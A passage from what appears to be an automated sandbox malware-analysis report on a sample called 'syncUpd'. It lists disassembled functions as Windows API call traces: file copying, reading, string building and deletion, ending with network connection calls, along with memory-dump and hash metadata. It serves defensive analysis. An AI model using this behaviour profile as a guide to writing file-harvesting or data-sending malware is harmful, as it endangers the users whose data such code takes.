                                                                                                                                                                                                                                                                • Part of subcall function 00905747: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00905772
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907007: lstrcpy.KERNEL32(?,00000000), ref: 0090704D
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008F9633
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008F9658
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: LocalAlloc.KERNEL32(00000040,?), ref: 008F9678
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: ReadFile.KERNEL32(000000FF,?,00000000,008F16B6,00000000), ref: 008F96A1
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: LocalFree.KERNEL32(008F16B6), ref: 008F96D7
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: CloseHandle.KERNEL32(000000FF), ref: 008F96E1
                                                                                                                                                                                                                                                                • Part of subcall function 00905797: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009057B9
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 008FEDC2
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 008FEE09
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 008FEE10
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,0041DCD4), ref: 008FEE2C
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEE3A
                                                                                                                                                                                                                                                                • Part of subcall function 00905207: malloc.MSVCRT ref: 0090520F
                                                                                                                                                                                                                                                                • Part of subcall function 00905207: strncpy.MSVCRT ref: 0090522A
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,0041DCDC), ref: 008FEE76
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEE84
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,0041DCE4), ref: 008FEEC0
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEECE
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,0041DCEC), ref: 008FEF0A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEF1C
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEFA9
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEFC1
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEFD9
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEFF1
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD08), ref: 008FF009
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD1C), ref: 008FF018
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD2C), ref: 008FF027
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FF03A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD34), ref: 008FF049
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FF05C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD38), ref: 008FF06B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD3C), ref: 008FF07A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FF08D
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD44), ref: 008FF09C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD48), ref: 008FF0AB
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FF0BE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD54), ref: 008FF0CD
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD58), ref: 008FF0DC
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 008FF120
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FF135
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008FF17E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3689735781-0
                                                                                                                                                                                                                                                              • Opcode ID: b16d59508813708b1d92d6ee10662e8f39c45857b8dfa9bcd2ae4a529fc321c5
                                                                                                                                                                                                                                                              • Instruction ID: 8d27217e2b0c6f8bb8f6fb7fc6de085cb1105cc346dc99679b097b13fb9ed01e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b16d59508813708b1d92d6ee10662e8f39c45857b8dfa9bcd2ae4a529fc321c5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35D14EB1D04208AFCB14EBF4DD9AEEEB739AF94710F504519F202A61D1DF74AA45CBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494stringmemoryfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040A369
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0095C850,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A510
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A532
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A554
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA94), ref: 0040A563
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040A605
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040A614
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040A65D
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040A689
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpylstrlen$AllocFileHeapmemset$CopyDeleteLocalProcessmemcmp
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1525483061-0
                                                                                                                                                                                                                                                              • Opcode ID: 6d247f341b7f3546061285bcf01454fcb19e159dab04dbae6386322d3ae48b79
                                                                                                                                                                                                                                                              • Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d247f341b7f3546061285bcf01454fcb19e159dab04dbae6386322d3ae48b79
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008FA297 Relevance: 32.0, APIs: 21, Instructions: 494stringmemoryfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 009072D7: StrCmpCA.SHLWAPI(DKb,008FA2AE,?,008FA2AE,00624B44), ref: 009072F6
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008FA5C9
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 008FA5D0
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008FA3B1
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrlen.KERNEL32(008F4E2C,?,?,008F4E2C,0041D79A), ref: 00907092
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrcpy.KERNEL32(0041D79A,00000000), ref: 009070EC
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FA711
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA80), ref: 008FA720
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FA733
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA84), ref: 008FA742
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FA755
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA88), ref: 008FA764
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FA777
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA8C), ref: 008FA786
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FA799
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA90), ref: 008FA7A8
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FA7BB
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA94), ref: 008FA7CA
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memcmp.MSVCRT ref: 008F9A72
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memset.MSVCRT ref: 008F9AA5
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: LocalAlloc.KERNEL32(00000040,?), ref: 008F9AF5
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FA813
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA98), ref: 008FA82D
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 008FA86C
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 008FA87B
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008FA8C4
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 008FA8F0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2228671196-0
                                                                                                                                                                                                                                                              • Opcode ID: 9e42199074a90107a8dead1a7d243c1108800441b4ba894103f5affc1eeccc27
                                                                                                                                                                                                                                                              • Instruction ID: c231d8460975d3f41a2a66522177e5a8274474f1da98cf751b93661d9b6729d9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e42199074a90107a8dead1a7d243c1108800441b4ba894103f5affc1eeccc27
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D022AB2904108AFCB18EBE0DD96EEEB339BF94711F104159F646A61D1DF34AE05CBA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0095FF10,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040C81E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C958
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C97A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C99C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040CA02
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040CA24
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0095C850,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040CA7A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040CA89
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040CAD2
                                                                                                                                                                                                                                                                • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040CAFE
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2775534915-0
                                                                                                                                                                                                                                                              • Opcode ID: 052790cbe17dc3a494b0e92ade055a40f0788430fa2dcaf8ae6e7200905dd4d4
                                                                                                                                                                                                                                                              • Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 052790cbe17dc3a494b0e92ade055a40f0788430fa2dcaf8ae6e7200905dd4d4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008FC8A7 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 009054C7: GetSystemTime.KERNEL32(0041D7D7,00624AA0,0041D129,?,?,008F1620,?,0000001A,0041D7D7,00000000,?,006249EC,?,004215A4,0041D7D6), ref: 009054ED
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008FC93A
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008FCA7E
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 008FCA85
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FCBBF
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBD8), ref: 008FCBCE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FCBE1
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBDC), ref: 008FCBF0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FCC03
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE0), ref: 008FCC12
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FCC25
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE4), ref: 008FCC34
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FCC47
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE8), ref: 008FCC56
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FCC69
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBEC), ref: 008FCC78
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FCC8B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBF0), ref: 008FCC9A
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrlen.KERNEL32(008F4E2C,?,?,008F4E2C,0041D79A), ref: 00907092
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrcpy.KERNEL32(0041D79A,00000000), ref: 009070EC
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 008FCCE1
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 008FCCF0
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008FCD39
                                                                                                                                                                                                                                                                • Part of subcall function 009072D7: StrCmpCA.SHLWAPI(DKb,008FA2AE,?,008FA2AE,00624B44), ref: 009072F6
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 008FCD65
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1973479514-0
                                                                                                                                                                                                                                                              • Opcode ID: 32b03903aea3df50e8a80283c090f6865379caf8b03cf1ca1c3a0eea1c34ea05
                                                                                                                                                                                                                                                              • Instruction ID: db4422a448f716bef7efc5d3f21ddcf08a7e0b0484af028162a235ef9caa908f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32b03903aea3df50e8a80283c090f6865379caf8b03cf1ca1c3a0eea1c34ea05
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBE109B2D04109AFCB14EBE0DD96EEEB339BF94711F104159F206A61E1DE35BA05CBA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 008F5877 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00907007: lstrcpy.KERNEL32(?,00000000), ref: 0090704D
                                                                                                                                                                                                                                                                • Part of subcall function 008F46D7: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008F475D
                                                                                                                                                                                                                                                                • Part of subcall function 008F46D7: InternetCrackUrlA.WININET(00000000,00000000), ref: 008F476D
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008F590F
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00624C68), ref: 008F592A
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008F5AAA
